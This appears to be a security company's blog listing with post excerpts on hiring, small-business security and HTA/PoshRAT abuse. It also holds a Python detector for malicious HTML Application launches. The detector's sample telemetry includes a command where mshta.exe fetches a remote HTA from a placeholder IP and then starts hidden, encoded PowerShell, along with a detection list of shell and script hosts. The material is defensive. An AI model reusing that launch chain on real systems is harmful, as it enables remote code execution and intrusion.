The industry’s got 99 security problems, and hiring will soon be number one

Chris Rothe

Steve Morgan recently published an article in Forbes titled Cybersecurity’s Labor Epidemic and did a great job compiling research on the looming cybersecurity talent shortage. Several of the most telling statistics and facts: “The demand for the (cybersecurity) workforce is expected to rise to 6 million (globally) by 2019, with a projected shortfall of 1.5 million” stated Michael Brown, CEO … Read More

Fundamental Security for Small Business

Phil Hagen

Small business owners and operators often believe they are less of a target for cyber crime than a large multinational company. However, this is a fallacy – one that may have severe consequences if the small business neglects to establish a reasonable security posture. Small business is a target due to the simple fact that most criminal … Read More

Microsoft HTML Application (HTA) Abuse, Part Deux

Keith McCammon, Chief Security Officer

In our most recent Detection Profile, we looked at a red team’s post-exploitation activity as detected by Red Canary. The tool was identified through open sources as PoshRat, a PowerShell-based remote access tool that takes advantage of a security policy bypass in Microsoft HTML Applications (HTA) to establish a reverse shell. Unfortunately, HTA abuse is widespread and not limited to … Read More

Integrating Red Canary & Sumo Logic

Keith McCammon, Chief Security Officer

A key step in the Red Canary on-boarding process is understanding customers’ processes and tools so we can configure integrations that minimize the need for IT and security analysts to break workflow and access yet another system. When everything from our context-rich detections to raw endpoint telemetry is integrated with your existing systems, you get immediately useful context without needing to learn a new tool or workflow. We are going … Read More

Red Canary vs. PoshRAT

Red Canary vs. PoshRAT: Detection in the Absence of Malware

Keith McCammon, Chief Security Officer

Detecting malware isn’t easy, per se. But in all but the most sophisticated* attacks, it comes down to detecting the introduction of something new into an environment. Most of the time this is trivial; some of the time it is subtle and challenging. In either case, it is orders of magnitude easier than detecting a malicious insider or an entrenched attacker, both of whom look similar … Read More
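The HTA abuse and PoshRAT posts above both make the same point: the attacker introduces no malware in the file-reputation sense, because everything that runs (mshta.exe, the Windows host for HTML Applications, and powershell.exe) is a signed Microsoft component. Detection has to key on behaviour, i.e. process lineage and command lines. The following is an added example written for this page, not Red Canary's own detection logic or telemetry format; the event schema, field names, the list of suspicious child processes, the sample process events, the TEST-NET address and the encoded command are all constructed assumptions.

```python
"""Behavioural detection of HTA abuse over constructed process-start telemetry.

Assumptions (not from the original post): a flat list of process-start events
with pid/ppid/image/cmdline/user fields, and the heuristic that a benign HTA
rarely needs to launch a scripting host or shell.
"""
from typing import Dict, List

# Children of mshta.exe that warrant an alert (assumption, see module docstring).
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample telemetry: a phishing-style chain (outlook -> mshta fetching a
# remote .hta -> hidden PowerShell) next to an administrator opening a local HTA.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "user": r"lab\alice"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\outlook.exe",
     "cmdline": "outlook.exe", "user": r"lab\alice"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/invoice.hta", "user": r"lab\alice"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA", "user": r"lab\alice"},
    # Benign: local HTA launched from explorer, no child interpreter.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta", "user": r"lab\admin"},
]


def _image_name(image: str) -> str:
    """Return the lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def lineage(event: Dict, by_pid: Dict[int, Dict]) -> str:
    """Walk ppid links to the root and render 'root > ... > event' as a string."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(_image_name(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return " > ".join(reversed(chain))


def detect_hta_abuse(events: List[Dict]) -> List[Dict]:
    """Return one alert per suspicious event; no file hash or signature is consulted."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = _image_name(e["image"])
        cmd = e["cmdline"].lower()

        # Rule 1: mshta.exe loading its HTA from a URL or UNC path rather than a
        # local file, which is how a remote payload would be staged.
        if name == "mshta.exe" and ("http://" in cmd or "https://" in cmd or "\\\\" in cmd):
            alerts.append({"rule": "mshta_remote_source", "pid": e["pid"],
                           "user": e["user"], "lineage": lineage(e, by_pid)})

        # Rule 2: mshta.exe spawning an interpreter or shell, the hand-off an
        # HTA-based PowerShell RAT needs to get a reverse shell running.
        parent = by_pid.get(e["ppid"])
        if parent and _image_name(parent["image"]) == "mshta.exe" and name in SUSPICIOUS_CHILDREN:
            alerts.append({"rule": "mshta_spawned_interpreter", "pid": e["pid"],
                           "user": e["user"], "lineage": lineage(e, by_pid)})
    return alerts


if __name__ == "__main__":
    for alert in detect_hta_abuse(SAMPLE_EVENTS):
        print(f"{alert['rule']:28} pid={alert['pid']} user={alert['user']} {alert['lineage']}")
```

Run against the constructed events, the two rules fire on the phishing chain (pids 300 and 400) and stay silent for the administrator's local HTA (pid 500). The lineage string is what an analyst triages on: "explorer.exe > outlook.exe > mshta.exe > powershell.exe" tells the story without any artefact on disk to hash. Both rules are deliberately simple; in production you would suppress known-good HTAs by path and signer of the parent rather than by file name alone.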

Applying the National Intelligence Process to Information Security

Cory Bowline

The “Intelligence” approach to information security is growing in popularity, but many are still struggling to define what this means to their own processes. Red Canary has drawn upon the time-tested and well-defined procedures followed by practitioners of secret intelligence – spies, satellites, drones, etc. – in order to explain how to build and manage an intelligence process that will … Read More

Closing Critical Gaps in the Defense Industrial Base

Cory Bowline

Every organization has gaps in its security posture. There is simply too much surface area and too few resources for organizations to perfectly cover all the gaps. Given enough time, attackers will find and exploit these gaps. Below is a high-level case study of one such incident that occurred a year ago at a mid-sized United States defense contractor. The contractor had appropriate perimeter … Read More